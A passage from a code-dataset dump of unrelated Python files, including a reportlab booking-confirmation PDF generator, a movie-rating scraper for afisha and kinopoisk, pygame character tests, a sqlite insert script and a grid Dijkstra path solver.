]\n","sub_path":"dra/migrations/0011_auto_20160122_1615.py","file_name":"0011_auto_20160122_1615.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"70364523","text":"from __future__ import print_function\nimport requests\nimport json\n\n# function to retrieve a picklist option using a picklist option ID\ndef get(url, auth):\n    # build url for request\n    requestURL = url\n    print(requestURL)\n    # make request\n    pickListOption = requests.get(requestURL, auth=auth)\n\n    if pickListOption.status_code >= 400:\n        
raise IOError(\"Error Code while retrieving data: \" + str(pickListOption.status_code))\n\n pickListOption_json = json.loads(pickListOption.text)\n\n return pickListOption_json","sub_path":"PickListOption.py","file_name":"PickListOption.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"348403062","text":"import os\nfrom io import BytesIO\nfrom datetime import date\n\nfrom reportlab.lib import enums\nfrom reportlab.lib.pagesizes import A4\nfrom reportlab.platypus import BaseDocTemplate, PageTemplate, Frame, Paragraph, Spacer, Table, TableStyle, ListFlowable, KeepTogether, PageBreak, Image, ImageAndFlowables\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nfrom reportlab.lib.utils import ImageReader\nfrom reportlab.lib.colors import HexColor\n\nfrom django.core.files import File\nfrom django.conf import settings\n\nfrom parkstay.models import Booking, BookingVehicleRego\n\n\nDPAW_HEADER_LOGO = os.path.join(settings.BASE_DIR, 'parkstay', 'static', 'ps', 'img', 'parkstay_header.png')\n\nLICENCE_HEADER_IMAGE_WIDTH = 840\nLICENCE_HEADER_IMAGE_HEIGHT = 166\n\nDPAW_BUSINESS = 'Parks and Visitor Services'\nDPAW_EMAIL = 'campgrounds@dpaw.wa.gov.au'\nDPAW_URL = 'https://parks.dpaw.wa.gov.au'\nDPAW_PHONE = '(08) 9219 9000'\nDPAW_FAX = '(08) 9423 8242'\nDPAW_PO_BOX = 'Locked Bag 104, Bentley Delivery Centre, Western Australia 6983'\n\n\nPAGE_WIDTH, PAGE_HEIGHT = A4\n\nDEFAULT_FONTNAME = 'Helvetica'\nBOLD_FONTNAME = 'Helvetica-Bold'\nITALIC_FONTNAME = 'Helvetica-Oblique'\nBOLD_ITALIC_FONTNAME = 'Helvetica-BoldOblique'\n\nVERY_LARGE_FONTSIZE = 14\nLARGE_FONTSIZE = 12\nMEDIUM_FONTSIZE = 10\nSMALL_FONTSIZE = 8\n\nPARAGRAPH_BOTTOM_MARGIN = 5\n\nSECTION_BUFFER_HEIGHT = 10\n\nDATE_FORMAT = '%d/%m/%Y'\n\nHEADER_MARGIN = 10\nHEADER_SMALL_BUFFER = 3\n\nPAGE_MARGIN = 20\nPAGE_TOP_MARGIN = 200\n\nLETTER_HEADER_MARGIN = 30\nLETTER_PAGE_MARGIN = 60\nLETTER_IMAGE_WIDTH = LICENCE_HEADER_IMAGE_WIDTH/3.0\nLETTER_IMAGE_HEIGHT = LICENCE_HEADER_IMAGE_HEIGHT/3.0\nLETTER_HEADER_RIGHT_LABEL_OFFSET = 400\nLETTER_HEADER_RIGHT_INFO_OFFSET = 450\nLETTER_HEADER_SMALL_BUFFER = 5\nLETTER_ADDRESS_BUFFER_HEIGHT = 40\nLETTER_BLUE_FONT = 0x045690\n\nstyles = getSampleStyleSheet()\nstyles.add(ParagraphStyle(name='InfoTitleLargeCenter', fontName=BOLD_FONTNAME, fontSize=LARGE_FONTSIZE,\n spaceAfter=PARAGRAPH_BOTTOM_MARGIN, alignment=enums.TA_CENTER))\nstyles.add(ParagraphStyle(name='InfoTitleVeryLargeCenter', fontName=BOLD_FONTNAME, fontSize=VERY_LARGE_FONTSIZE,\n spaceAfter=PARAGRAPH_BOTTOM_MARGIN * 2, alignment=enums.TA_CENTER))\nstyles.add(ParagraphStyle(name='InfoTitleLargeLeft', fontName=BOLD_FONTNAME, fontSize=LARGE_FONTSIZE,\n spaceAfter=PARAGRAPH_BOTTOM_MARGIN, alignment=enums.TA_LEFT,\n leftIndent=PAGE_WIDTH / 10, rightIndent=PAGE_WIDTH / 10))\nstyles.add(ParagraphStyle(name='InfoTitleLargeRight', fontName=BOLD_FONTNAME, fontSize=LARGE_FONTSIZE,\n spaceAfter=PARAGRAPH_BOTTOM_MARGIN, alignment=enums.TA_RIGHT,\n rightIndent=PAGE_WIDTH / 10))\nstyles.add(ParagraphStyle(name='BoldLeft', fontName=BOLD_FONTNAME, fontSize=MEDIUM_FONTSIZE, alignment=enums.TA_LEFT))\nstyles.add(ParagraphStyle(name='BoldRight', fontName=BOLD_FONTNAME, fontSize=MEDIUM_FONTSIZE, alignment=enums.TA_RIGHT))\nstyles.add(ParagraphStyle(name='ItalicLeft', fontName=ITALIC_FONTNAME, fontSize=MEDIUM_FONTSIZE, alignment=enums.TA_LEFT))\nstyles.add(ParagraphStyle(name='ItalicRight', fontName=ITALIC_FONTNAME, fontSize=MEDIUM_FONTSIZE, 
alignment=enums.TA_RIGHT))\nstyles.add(ParagraphStyle(name='Center', alignment=enums.TA_CENTER))\nstyles.add(ParagraphStyle(name='Left', alignment=enums.TA_LEFT))\nstyles.add(ParagraphStyle(name='Right', alignment=enums.TA_RIGHT))\nstyles.add(ParagraphStyle(name='LetterLeft', fontSize=LARGE_FONTSIZE, alignment=enums.TA_LEFT))\nstyles.add(ParagraphStyle(name='LetterBoldLeft', fontName=BOLD_FONTNAME, fontSize=LARGE_FONTSIZE, alignment=enums.TA_LEFT))\n\n\ndef _create_letter_header_footer(canvas, doc):\n # header\n current_y = PAGE_HEIGHT - LETTER_HEADER_MARGIN\n\n dpaw_header_logo = ImageReader(DPAW_HEADER_LOGO)\n canvas.drawImage(dpaw_header_logo, LETTER_HEADER_MARGIN, current_y - LETTER_IMAGE_HEIGHT,\n width=LETTER_IMAGE_WIDTH, height=LETTER_IMAGE_HEIGHT)\n\n\ndef create_confirmation(confirmation_buffer, booking):\n every_page_frame = Frame(PAGE_MARGIN, PAGE_MARGIN, PAGE_WIDTH - 2 * PAGE_MARGIN,\n PAGE_HEIGHT - 160, id='EveryPagesFrame')\n every_page_template = PageTemplate(id='EveryPages', frames=every_page_frame, onPage=_create_letter_header_footer)\n\n doc = BaseDocTemplate(confirmation_buffer, pageTemplates=[every_page_template], pagesize=A4)\n\n elements = []\n\n elements.append(Paragraph('BOOKING CONFIRMATION', styles['InfoTitleVeryLargeCenter']))\n\n #im = Image(os.path.join(settings.BASE_DIR, 'parkstay', 'static', 'ps', 'img', 'placeholder.jpg'))\n #text1 = Paragraph('But they had not gone twenty yards when they stopped short. An uproar of voices was coming from the farmhouse. They rushed back and looked through the window again. Yes, a violent quarrel was in progress. There were shoutings, bangings on the table, sharp suspicious glances, furious denials. The source of the trouble appeared to be that Napoleon and Mr. Pilkington had each played an ace of spades simultaneously.', styles['Left'])\n #text2 = Paragraph('Twelve voices were shouting in anger, and they were all alike. No question, now, what had happened to the faces of the pigs. 
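# ------------------------------------------------------------------------------
# Illustrative aside (a hedged, self-contained sketch, not part of pdf.py): the
# confirmation below is assembled from platypus flowables; this is the same
# Table/TableStyle pattern in miniature. The output filename is arbitrary.
from reportlab.lib.pagesizes import A4
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.platypus import Paragraph, SimpleDocTemplate, Table, TableStyle

styles = getSampleStyleSheet()
rows = [[Paragraph('Campground', styles['Normal']),
         Paragraph('Example Campground, Example Park', styles['Normal'])]]
doc = SimpleDocTemplate('confirmation_sketch.pdf', pagesize=A4)
doc.build([Table(rows, colWidths=(200, None),
                 style=TableStyle([('VALIGN', (0, 0), (-1, -1), 'TOP')]))])
# ------------------------------------------------------------------------------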
The creatures outside looked from pig to man, and from man to pig, and from pig to man again; but already it was impossible to say which was which.', styles['Left'])\n\n    #elements.append(ImageAndFlowables(im, [text1, text2], imageSide='left'))\n\n    table_data = []\n    table_data.append([Paragraph('Campground', styles['BoldLeft']), Paragraph('{}, {}'.format(booking.campground.name, booking.campground.park.name), styles['BoldLeft'])])\n    \n    if booking.first_campsite_list:\n        campsites = []\n        if booking.campground.site_type == 0:\n            for item in booking.first_campsite_list:\n                campsites.append(item.name if item else \"\")\n        elif booking.campground.site_type in (1, 2):  # matches site_type 1 or 2; '== 1 or 2' is always truthy\n            for item in booking.first_campsite_list:\n                campsites.append(item.type.split(':',1)[0] if item else \"\")\n        campsite = ', '.join(campsites)\n        # collapse duplicates into counts, e.g. \"2x Standard, 1x Powered\"\n        result = {x:campsites.count(x) for x in campsites}\n        campsite = ', '.join(['%sx %s' % (value, key) for (key, value) in result.items()])\n\n        table_data.append([Paragraph('Camp Site', styles['BoldLeft']), Paragraph(campsite, styles['Left'])])\n    \n    table_data.append([Paragraph('Dates', styles['BoldLeft']), Paragraph(booking.stay_dates, styles['Left'])])\n    table_data.append([Paragraph('Number of guests', styles['BoldLeft']), Paragraph(booking.stay_guests, styles['Left'])])\n    table_data.append([Paragraph('Name', styles['BoldLeft']), Paragraph(u'{} {} ({})'.format(booking.details.get('first_name', ''), booking.details.get('last_name', ''), booking.customer.email if booking.customer else None), styles['Left'])])\n    table_data.append([Paragraph('Booking confirmation number', styles['BoldLeft']), Paragraph(booking.confirmation_number, styles['Left'])])\n\n    if booking.vehicle_payment_status:\n        vehicle_data = []\n        for r in booking.vehicle_payment_status:\n            data = [Paragraph(r['Type'], styles['Left']), Paragraph(r['Rego'], styles['Left'])]\n            if r.get('Paid') is not None:\n                if r['Paid'] == 'Yes':\n                    data.append(Paragraph('Entry fee paid', styles['Left']))\n                elif r['Paid'] == 'No':\n                    data.append(Paragraph('Unpaid', styles['Left']))\n                elif r['Paid'] == 'pass_required':\n                    data.append(Paragraph('Park Pass Required', styles['Left']))\n            vehicle_data.append(data)\n        \n        vehicles = Table(vehicle_data, style=TableStyle([('VALIGN', (0, 0), (-1, -1), 'TOP')]))\n        table_data.append([Paragraph('Vehicles', styles['BoldLeft']), vehicles])\n    else:\n        table_data.append([Paragraph('Vehicles', styles['BoldLeft']), Paragraph('No vehicles', styles['Left'])])\n    \n    if booking.campground.additional_info: \n        table_data.append([Paragraph('Additional confirmation information', styles['BoldLeft']), Paragraph(booking.campground.additional_info, styles['Left'])])\n\n    elements.append(Table(table_data, colWidths=(200, None), style=TableStyle([('VALIGN', (0, 0), (-1, -1), 'TOP')])))\n\n    doc.build(elements)\n    return confirmation_buffer\n\n\n\n\ndef test():\n    import tempfile\n    import subprocess\n\n    b = Booking.objects.get(id=34901)\n\n    t = tempfile.NamedTemporaryFile()\n    create_confirmation(t, b)\n    t.flush()\n    subprocess.call(['evince', t.name])\n    t.close()\n","sub_path":"parkstay/pdf.py","file_name":"pdf.py","file_ext":"py","file_size_in_byte":8665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"382751738","text":"#!/usr/bin/python\n\nimport sys\n\nfrom easydict import easydict\nfrom cgix import *\nfrom jirunder_arrest import render_jira_markup, get_resp_data\n\n\n_render_test_html = u\"\"\"\\\n\n\n\njirunder-arrest - Render Test\n\n\n\n\n\n
\n\n
\n\n
\n\n
\n\n
\n\n
\n{_rendered}\n
\n\n\n\n\"\"\"\n\n\ndef get_render_page_html(jml):\n e = easydict()\n if jml:\n issue = 'SOFTWARE-1234' # arbitrarily\n resp = render_jira_markup(issue, jml)\n e._rendered = get_resp_data(resp)\n e._jml = escape_html(jml)\n else:\n e._rendered = ''\n e._jml = ''\n\n return _render_test_html.format(**e)\n\n\ndef main(args):\n uri, params = parse_request_uri()\n\n params = params or get_postdata_params()\n jml = params and params.get('jml')\n send_data(get_render_page_html(params and params.get('jml')))\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n\n\n","sub_path":"render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"104539158","text":"# -*- coding:utf-8 -*-\n'''\n测试:人物类:person_class\n'''\n\nfrom person_class import *\nimport os\nimport sys\nsys.path.append(\"..\")\nimport const.my_const\nfrom const.my_const import *\n\ndef createTestEnvironment():\n '''\n 创建PersonClass测试环境\n :return:\n '''\n screen = pygame.display.set_mode((1440,900), 0, 32)\n person = Person(PATH_Wxh, (1000,50), 300.0)\n return (screen, person)\n\n#----------------------------------------------存储图片测试的分割线-------------------------------------------------------\n\ndef test_image_filename_judge():\n '''\n 测试:image_filename_judge\n 将文件夹内的图片分类存入字典\n :return:\n '''\n image_dictionary = {\n (-1.0,0.0) : ['LEFT', []], (1.0,0.0) : ['RIGHT', []],\n (0.0,-1.0) : ['UP', []], (0.0,1.0) : ['DOWN', []],\n (-1.0,-1.0) : ['LEFTUP', []], (-1.0,1.0) : ['LEFTDOWN', []],\n (1.0,-1.0) : ['RIGHTUP',[]], (1.0,1.0) : ['RIGHTDOWN',[]],\n (0.0, 0.0) : ['NONE', []]\n }\n for f in os.listdir(PATH_Wxh):\n Person.image_filename_judge(f, image_dictionary)\n\n for each in image_dictionary:\n print(image_dictionary[each])\n\n\n\ndef test_image_dictionary():\n '''\n 测试:person类中test_image_dictionary内的数据\n 你说我为啥蛋疼的要去改变量名呢~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n :return:\n '''\n screen = pygame.display.set_mode((1440,900), 0, 32)\n person = Person(PATH_Wxh, (0,0), 300.0)\n for each in person.image_dictionary:\n print(person.image_dictionary[each])\n\n\n\n#----------------------------------------------------移动测试的分割线-------------------------------------------------------------\n\ndef test_person_move_direction():\n '''\n 测试角色移动方向:person_move_direction\n 手动\n :return:\n '''\n screen, person =createTestEnvironment()\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n exit()\n if event.type == KEYDOWN:\n move_direction= person.person_move_direction()\n print('move_direction:', move_direction)\n screen.fill((255,255,255))\n pygame.display.update()\n\ndef test_person_move_image():\n '''\n 接收移动方向向量,返回相应图片\n :return:\n '''\n screen, person =createTestEnvironment()\n for key in person.image_dictionary:\n for num in range(70):\n print(person.person_move_image(key))\n #screen.fill((255,255,255))\n #pygame.display.update()\n\ndef test_move_image_action():\n '''\n 测试:接收移动方向list,返回动作下标,由self.num计数\n :return:\n '''\n screen, person =createTestEnvironment()\n lists = ['DOWN_1.png', 'DOWN_2.png', 'DOWN_3.png', 'DOWN_4.png', 'DOWN_5.png', 'DOWN_6.png', 'DOWN_7.png', 'DOWN_8.png']\n test_lists = lists[1:9]*2\n judge_list = []\n for each in range(14):\n test_action = person.move_image_action(lists)\n if test_action == test_lists[each]:\n judge_list.append(True)\n else:\n print(\"%s.Error\")\n print(\"level\", each, \"move_image_action: \", test_action, \"test_demo: \", test_lists[each])\n if len(judge_list) == 14:\n 
print(\"test_move_image_action(): OK!\")\n\ndef test_person_move_image():\n '''\n 测试:接收移动方向向量,返回相应图片\n :return:\n '''\n screen, person =createTestEnvironment()\n judge_list = []\n for each in person.image_dictionary:\n if person.person_move_image(each) == person.image_dictionary[each][1][person.num]:\n judge_list.append(True)\n if len(judge_list) == 9:\n print(\"test_person_move_image() : OK!\")\n\ndef test_personMove():\n '''\n 测试角色移动:personMove\n 手动\n 测试有问题,还没想好......\n :return:\n '''\n\n screen, person =createTestEnvironment()\n image = 'image\\\\background2.jpg'\n backGround = BackGround(image)\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n exit()\n screen.blit(backGround.image, (0,0))\n person.person_move(backGround, screen)\n print('vector: ', person.vector, 'image: ', person.imageKey)\n pygame.display.update()\n\ndef test_render():\n screen, person =createTestEnvironment()\n #image = 'image\\\\background2.jpg'\n backGround = BackGround(const.my_const.SCENE_SHELTER_KEZHAN)\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n exit()\n screen.blit(backGround.image, (0,0))\n person.render(screen)\n pygame.display.update()\n\ndef test_person_move_distance_image():\n '''\n 测试:计算移动向量(包括距离和方向)\n :return:\n '''\n screen, person =createTestEnvironment()\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n exit()\n test_vector, test_image = person.person_move_distance_image()\n print(\"move_vetor: \", test_vector, \"image_key: \", test_image)\n pygame.display.update()\n\ndef test_color_judge_point():\n '''\n 测试:\n 接收绘制坐标(左上角)\n 返回颜色判断坐标(下边中心位置)\n :return:\n '''\n screen, person =createTestEnvironment()\n if person.color_judge_point([100,100]) == [132, 193]:\n print(\"test_color_judge_point: OK!\")\n else:\n print(\"test_color_judge_point: Error!\")\n print(\"Error result: \", person.color_judge_point([100,100]))\n\n#----------------------------------------------碰撞检测测试的分割线-------------------------------------------------------\n\n\ndef test_impactRange():\n '''\n 测试:计算碰撞的范围\n :return:\n '''\n screen, person =createTestEnvironment()\n xList, yList = person.impactRange()\n print(type(person.vector))\n if xList == range(0, 64+1) and yList == range(0, 104 + 1):\n print(\"test_impactRange: OK!\")\n else:\n print(\"test_impactRange: Error!\")\n print(\"xList: %s \\n yList: %s\" % (xList, yList))\n\ndef test_moveJudge():\n '''\n 测试:检测人物是否处在遮挡层黑色部分\n :return:\n '''\n screen, person =createTestEnvironment()\n #print(type(person.vector))\n image = 'image\\\\background1.jpg'\n backGround = BackGround(image)\n #此处应为白色,返回True\n person.vector = Vector2(300,300)\n if person.moveJudge(backGround, screen):\n print(\"test_moveJudge: OK!\")\n else:\n print(\"test_moveJudge: Error!\")\n print(\"color: \", (backGround.getColor(screen, (50,0))))\n\n#----------------------------------------------启动测试的分割线-------------------------------------------------------\n\n\nif __name__ == \"__main__\":\n '''存储图片测试'''\n #test_image_filename_judge()\n #test_image_dictionary()\n '''移动测试'''\n test_render()\n #test_personMove() #这个测试还没写好....\n #est_color_judge_point()\n #test_person_move_distance_image()\n #test_person_move_direction()\n #test_person_move_image()\n #test_move_image_action()\n '''碰撞检测测试'''\n\n","sub_path":"person_class/test_person_class.py","file_name":"test_person_class.py","file_ext":"py","file_size_in_byte":7605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"178019359","text":"import 
json\nimport logging\nimport sys\n\nimport requests\nfrom lxml import html\n\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n\n\ndef fetch_afisha_page():\n url = 'https://www.afisha.ru/msk/schedule_cinema/'\n return requests.get(url).text\n\n\ndef parse_afisha_list(raw_html):\n tree = html.fromstring(raw_html)\n movie_titles = tree.xpath('//*[@id=\"schedule\"]/div/div[2]/h3/a/text()')\n movie_links = tree.xpath('//*[@id=\"schedule\"]/div/div[2]/h3/a/@href')\n theater_tables = tree.xpath('//*[@id=\"schedule\"]/div/table/tbody')\n theater_counts = [len(table.getchildren()) for table in theater_tables]\n raw_movies = list(zip(movie_titles, movie_links, theater_counts))\n movie_properties = ('title', 'url', 'theatre_count')\n return [dict(zip(movie_properties, raw_movie)) for raw_movie in raw_movies]\n\n\ndef fetch_movie_info_from_kinopoisk(movie_title):\n # kinopoisk search suggestion system usually gives us the result we want\n # and it probably won't ban us because of frequent requests\n logging.debug('Fetching %s', movie_title)\n url = 'https://suggest-kinopoisk.yandex.net/suggest-kinopoisk'\n headers = {\n 'Host': 'suggest-kinopoisk.yandex.net',\n 'Origin': 'https://plus.kinopoisk.ru',\n 'Accept-Language': 'en-us',\n 'Accept-Encoding': 'gzip, deflate',\n 'Connection': 'close',\n 'Accept': '*/*',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30',\n 'Referer': 'https://plus.kinopoisk.ru/',\n 'DNT': '1',\n }\n params = {\n 'srv': 'kinopoisk',\n 'part': movie_title,\n '_': '1504208262833',\n }\n response = requests.get(\n url,\n headers=headers,\n params=params\n )\n raw_json_response = response.json()\n logging.debug('raw json response: %s', raw_json_response)\n if raw_json_response[2]:\n return json.loads(raw_json_response[2][0])\n else:\n raise RuntimeWarning(\n \"Couldn't get kinopoisk info for '{}'\".format(movie_title)\n )\n\n\ndef fetch_movie_rating_info(movie_title):\n try:\n kinopoisk_info = fetch_movie_info_from_kinopoisk(movie_title)\n except RuntimeWarning as e:\n logging.warning(e)\n else:\n kinopoisk_rating = kinopoisk_info.get('rating')\n if kinopoisk_rating and kinopoisk_rating['ready']:\n rating_info = {}\n rating_info['rating'] = kinopoisk_rating['rate']\n rating_info['votes'] = kinopoisk_rating['votes']\n return rating_info\n else:\n logging.info(\n 'Rating for %s is not available yet',\n movie['title']\n )\n\n\ndef output_rated_movie_to_stdout(movie):\n print(\n '{} - Рейтинг {} ({}) - Количество кинотеатров: {} - {}'.format(\n movie['title'],\n movie['rating'],\n movie['votes'],\n movie['theatre_count'],\n movie['url'],\n )\n )\n\n\nif __name__ == '__main__':\n raw_afisha_html = fetch_afisha_page()\n movies = parse_afisha_list(raw_afisha_html)\n rated_movies = []\n for movie in movies:\n rating_info = fetch_movie_rating_info(movie['title'])\n if rating_info:\n movie['rating'] = rating_info['rating']\n movie['votes'] = rating_info['votes']\n rated_movies.append(movie)\n rated_movies.sort(\n key=lambda movie: movie['rating'],\n reverse=True\n )\n movies_to_output = 10\n for movie in rated_movies[:movies_to_output]:\n output_rated_movie_to_stdout(movie)\n","sub_path":"cinemas.py","file_name":"cinemas.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"545094047","text":"\nimport sqlite3\nimport random\n\nnumbers = {}\n\nwith sqlite3.connect(\"newnum.db\") as connection:\n\n c = 
connection.cursor()\n\n c.execute(\"DROP TABLE IF exists integers\")\n c.execute(\"CREATE TABLE IF not exists integers(ind INT, value INT)\")\n\n for i in range(0,100):\n j = random.randint(0,100)\n numbers[i] = j\n\n for entry in numbers:\n c.execute(\"INSERT INTO integers VALUES(?, ?)\", (entry, numbers[entry]))\n connection.commit()\n # print entry, numbers[entry]\n","sub_path":"sql-homework-11_insert.py","file_name":"sql-homework-11_insert.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"505687619","text":"#!/usr/bin/env python\n\nimport numpy as np\nfrom grid import *\nimport queue\nfrom grid_waypoint import GridWayPoint\n\ndebug_file = open(\"images/dijkstra/dijkstra_debug.txt\", \"w+\")\n\ndef dijkstra_solve(grid, \n allowDiagonalMoves = False,\n avoidObstacles = False,\n weightXDistance = 1,\n weightYDistance = 1):\n \n parents = {}\n costs = {}\n frontier = queue.PriorityQueue()\n\n start_wp = grid.start_waypoint\n # Add the start waypoint to the queue and mark it as visited\n frontier.put((0, start_wp))\n parents[start_wp] = None\n grid[start_wp.x, start_wp.y] |= GridFlags.VISITED\n costs[start_wp] = 0\n\n wp = None\n while not frontier.empty():\n wp = frontier.get()[1]\n # Flag the cell as the current cell. This is only needed for \n # coloring/visualization\n grid[wp.x, wp.y] |= GridFlags.CURRENT\n debug_file.write(\"----------------------------------------------------\\n\")\n debug_file.write(\"Current Waypoint is: \" + str(wp) + \"\\n\")\n debug_file.write(\"Number of waypoints in queue: \" + str(frontier.qsize()) + \"\\n\")\n \n if (wp.x == grid.goal_waypoint.x and wp.y == grid.goal_waypoint.y):\n debug_file.write(\"Found goal, exiting loop\")\n break\n neighbors = grid.find_neighbors(wp, allowDiagonalMoves)\n for neighbor in neighbors:\n # Need to accumulate the cost, so take the cost to get from the start\n # to the current waypoint, and the cost of moving from the current\n # waypoint to the neighbor\n new_cost = costs[wp] + weightXDistance * abs(wp.x - neighbor.x) + weightYDistance * abs(wp.y - neighbor.y)\n if avoidObstacles:\n if grid.is_near_obstacle(neighbor, allowDiagonalMoves):\n new_cost += 10000\n\n debug_file.write(\"~~~~~~~~~~~\" + \"\\n\")\n debug_file.write(\"Neighbor: \" + str(neighbor) + \"\\n\")\n debug_file.write(\"Cost calculated is: \" + str(new_cost) + \"\\n\")\n # We have a cost for this neighbor, but we need to do two checks:\n # 1. Is this a new neighbor? never been visited before?\n # 2. If it has been visited before, is the new cost lower\n # then the previous calculated cost. 
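            # Illustrative aside (hedged, standalone): the test above is the
            # relaxation step at the heart of Dijkstra. The same loop over a
            # plain adjacency dict, with heapq instead of queue.PriorityQueue:
            #     import heapq
            #     def dijkstra(adj, start):          # adj: {node: [(nbr, w), ...]}
            #         costs, pq = {start: 0}, [(0, start)]
            #         while pq:
            #             c, u = heapq.heappop(pq)
            #             if c > costs.get(u, float('inf')):
            #                 continue               # stale queue entry
            #             for v, w in adj[u]:
            #                 if c + w < costs.get(v, float('inf')):
            #                     costs[v] = c + w   # cheaper path found: relax
            #                     heapq.heappush(pq, (c + w, v))
            #         return costs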
This would indicate we have found\n # a \"better\" path to this neighbor\n #\n # First check, this cell is never been visited, and the \n # second check is checking that the new cost is lest the previously\n # calculated cost\n if neighbor not in costs or new_cost < costs[neighbor]:\n # Check only for debugging, if cost is lower write it to file\n if neighbor in costs and new_cost < costs[neighbor]:\n debug_file.write(\"Lower cost determined, previous cost was: \" + str(costs[neighbor]) + \"\\n\")\n costs[neighbor] = new_cost\n # Update the parent cell as well\n parents[neighbor] = wp\n frontier.put((new_cost, neighbor))\n # Mark the cell as visited, this is just for visualization\n grid[neighbor.x, neighbor.y] |= GridFlags.VISITED\n\n # Turn off the current flag, only needed for visualization\n grid[wp.x, wp.y] &= ~GridFlags.CURRENT\n\n parent = parents[wp]\n number_of_steps = 1\n total_cost = costs[wp]\n while parent is not None:\n grid[parent.x, parent.y] |= GridFlags.PATH\n parent = parents[parent]\n number_of_steps += 1\n total_cost += costs[wp]\n print(\"Total number of steps: \" + str(number_of_steps))\n print(\"Total cost: \" + str(total_cost))\n return number_of_steps\n\nif __name__ == \"__main__\":\n\n\n grid = Grid(gridFile = \"fixed_grid/new_fixed_grid.txt\")\n # Default behavior\n num_steps = dijkstra_solve(grid, \n allowDiagonalMoves=False, \n weightXDistance=1, \n weightYDistance=1,\n avoidObstacles=False)\n grid.save_grid_as_image(\"images/dijkstra/dijkstra_4_moves\",\n titleFigure = \"4 Moves Equal weighting\\n\" + str(num_steps) + \" Number of steps\")\n # Weighting X direction\n grid.load_from_file(\"fixed_grid/new_fixed_grid.txt\")\n num_steps = dijkstra_solve(grid, \n allowDiagonalMoves=False, \n weightXDistance=100, \n weightYDistance=1,\n avoidObstacles=False)\n grid.save_grid_as_image(\"images/dijkstra/dijkstra_4_moves_xweighted\",\n titleFigure = \"4 Moves 100 X weighting\\n\" + str(num_steps) + \" Number of steps\")\n # Weighting Y direction\n grid.load_from_file(\"fixed_grid/new_fixed_grid.txt\")\n num_steps = dijkstra_solve(grid, \n allowDiagonalMoves=False, \n weightXDistance=1, \n weightYDistance=100,\n avoidObstacles=False)\n grid.save_grid_as_image(\"images/dijkstra/dijkstra_4_moves_yweighted\",\n titleFigure = \"4 Moves 100 Y weighting\\n\" + str(num_steps) + \" Number of steps\")\n # Avoid Obstacles\n grid.load_from_file(\"fixed_grid/new_fixed_grid.txt\")\n num_steps = dijkstra_solve(grid, \n allowDiagonalMoves=False, \n weightXDistance=1, \n weightYDistance=1,\n avoidObstacles=True)\n grid.save_grid_as_image(\"images/dijkstra/dijkstra_4_moves_avoid_obstacles\",\n titleFigure = \"4 Moves Equal weighting avoid obstalces\\n\" + str(num_steps) + \" Number of steps\")\n\n \"\"\" -------------------------------------\n Allowing Diagonal moves\n -------------------------------------\n \"\"\"\n\n grid.load_from_file(\"fixed_grid/new_fixed_grid.txt\")\n # Default behavior\n num_steps = dijkstra_solve(grid, \n allowDiagonalMoves=True, \n weightXDistance=1, \n weightYDistance=1,\n avoidObstacles=False)\n grid.save_grid_as_image(\"images/dijkstra/dijkstra_8_moves\",\n titleFigure = \"8 Moves Equal weighting\\n\" + str(num_steps) + \" Number of steps\")\n # Weighting X direction\n grid.load_from_file(\"fixed_grid/new_fixed_grid.txt\")\n num_steps = dijkstra_solve(grid, \n allowDiagonalMoves=True, \n weightXDistance=100, \n weightYDistance=1,\n avoidObstacles=False)\n grid.save_grid_as_image(\"images/dijkstra/dijkstra_8_moves_xweighted\",\n titleFigure = \"8 Moves 100 
X weighting\\n\" + str(num_steps) + \" Number of steps\")\n # Weighting Y direction\n grid.load_from_file(\"fixed_grid/new_fixed_grid.txt\")\n num_steps = dijkstra_solve(grid, \n allowDiagonalMoves=True, \n weightXDistance=1, \n weightYDistance=100,\n avoidObstacles=False)\n grid.save_grid_as_image(\"images/dijkstra/dijkstra_8_moves_yweighted\",\n titleFigure = \"8 Moves 100 Y weighting\\n\" + str(num_steps) + \" Number of steps\")\n # Avoid Obstacles\n grid.load_from_file(\"fixed_grid/new_fixed_grid.txt\")\n num_steps = dijkstra_solve(grid, \n allowDiagonalMoves=True, \n weightXDistance=1, \n weightYDistance=1,\n avoidObstacles=True)\n grid.save_grid_as_image(\"images/dijkstra/dijkstra_8_moves_avoid_obstacles\",\n titleFigure = \"8 Moves Equal weighting avoid obstalces\\n\" + str(num_steps) + \" Number of steps\")","sub_path":"week1/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":7114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"447395855","text":"#!/usr/bin/env python\n\"\"\"\nDefines Splitter class for splitting strings of contiguous non-whitespace\ncharacters into strings of space-separated words. Requires language model in\nARPA format specifying lowercase unigrams and bigrams and a text to train\ncharacter probabilities. Uses Katz backoff smoothing for unseen bigrams, but strings\ncontaining unseen unigrams are returned unsplit. Splitting is case insensitive.\n\"\"\"\n\nfrom __future__ import print_function\n\nfrom sys import argv\nfrom string import split,strip\nfrom collections import deque\nfrom math import log10\n\n\n\nclass Splitter(object):\n\n def __init__(self, lmFile, charTextFile, lmWeight=1.0):\n\n # read token likelihoods from 